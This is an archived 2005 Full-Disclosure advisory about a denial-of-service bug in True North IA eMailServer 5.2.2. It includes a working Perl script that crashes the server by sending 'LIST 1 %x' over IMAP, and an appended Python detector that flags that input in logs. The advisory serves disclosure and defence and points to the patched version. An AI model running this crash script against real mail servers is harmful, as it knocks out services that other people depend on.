[Full-disclosure] Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051.

From: Reed Arvin (reedarvin_at_gmail.com)
Date: 06/27/05

    Date: Mon, 27 Jun 2005 01:02:10 -0700
    To: full-disclosure@lists.grok.org.uk, vuln@secunia.com, news@securiteam.com
    
    

    Summary:
    Denial of Service Vulnerability in True North Software, Inc. IA
    eMailServer Corporate Edition Version: 5.2.2. Build: 1051.
    (http://www.tnsoft.com/)

    Details:
    Input to the IMAP4 LIST command is not properly checked and/or
    filtered. Issuing a single character '%x' as the second argument to
    the LIST command will cause the MailServer.exe process to die.

    Vulnerable Versions:
    True North Software, Inc. IA eMailServer Corporate Edition Version:
    5.2.2. Build: 1051.

    Patches/Workarounds:
    IA eMailServer Corporate Edition Version: 5.3.4. Build: 2019. is not
    vulnerable to this attack. It is available at http://www.tnsoft.com/.

    Exploit:
    Run the following Perl script against the server. The process will die.

    #===== Start IAeMailServer_DOS.pl =====
    #
    # Usage: IAeMailServer_DOS.pl <ip>
    # IAeMailServer_DOS.pl 127.0.0.1
    #
    # True North Software, Inc. IA eMailServer Corporate Edition
    # Version: 5.2.2. Build: 1051.
    #
    # Download:
    # http://www.tnsoft.com/
    #
    #############################################################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "143",
                                        Proto => "TCP"))
    {
            print "Attempting to kill IA eMailServer at $ARGV[0]:143...";

            sleep(1);

            print $socket "0000 LOGIN hello moto\r\n";

            sleep(1);

            print $socket "0001 LIST 1 \%x\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:143\n";
    }
    #===== End IAeMailServer_DOS.pl =====

    Discovered by Reed Arvin reedarvin[at]gmail[dot]com
    (http://reedarvin.thearvins.com/)

    Vulnerability discovered using PeachFuzz
    (http://reedarvin.thearvins.com/tools.html)
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
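
For anyone still running the vulnerable build, a detection sketch for the trigger described under "Details", added here as an example and not part of the original advisory or the vendor's code: it parses client IMAP command lines (from a proxy or packet-capture log) and flags LIST commands whose second argument is exactly %x, while leaving ordinary LIST wildcards such as % alone. The function names and sample lines are constructed for illustration; treating the quoted form "%x" as equivalent is an assumption based on IMAP string syntax, since the advisory only shows the bare form.

```python
import re

# Tag, command word, and the remainder of one client IMAP command line.
_CMD = re.compile(r'^(\S+)\s+(\S+)(?:\s+(.*))?$')
# One argument: a quoted string (backslash escapes allowed) or a bare atom.
_ARG = re.compile(r'"((?:[^"\\]|\\.)*)"|(\S+)')


def list_args(line):
    """Return (tag, [args]) when the line is a LIST command, else None."""
    m = _CMD.match(line.rstrip("\r\n"))
    if not m or m.group(2).upper() != "LIST":
        return None
    args = []
    for quoted, atom in _ARG.findall(m.group(3) or ""):
        # A quoted match leaves atom empty; undo its backslash escapes.
        args.append(re.sub(r'\\(.)', r'\1', quoted) if atom == "" else atom)
    return m.group(1), args


def is_advisory_trigger(line):
    """True when the second LIST argument is exactly %x, as in the advisory."""
    parsed = list_args(line)
    return bool(parsed) and len(parsed[1]) >= 2 and parsed[1][1] == "%x"


def scan(lines):
    """Return (line_number, tag) for every line matching the trigger."""
    return [(n, list_args(l)[0])
            for n, l in enumerate(lines, 1) if is_advisory_trigger(l)]


# Constructed sample input; the first two lines mirror what the script sends.
SAMPLE = [
    '0000 LOGIN hello moto',
    '0001 LIST 1 %x',        # trigger from the advisory
    'a002 LIST "" %',        # ordinary top-level wildcard listing
    'a003 list "" "%x"',     # same argument, quoted, lowercase command
    'a004 LIST "" INBOX/%',  # ordinary wildcard under INBOX
    'a005 SELECT %x',        # not a LIST command
]

if __name__ == "__main__":
    for number, tag in scan(SAMPLE):
        print(f"line {number}: tag {tag} sends LIST with second argument %x")
```

A hit means the client sent the input that kills MailServer.exe on 5.2.2 Build 1051; the fix remains the upgrade named under "Patches/Workarounds".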

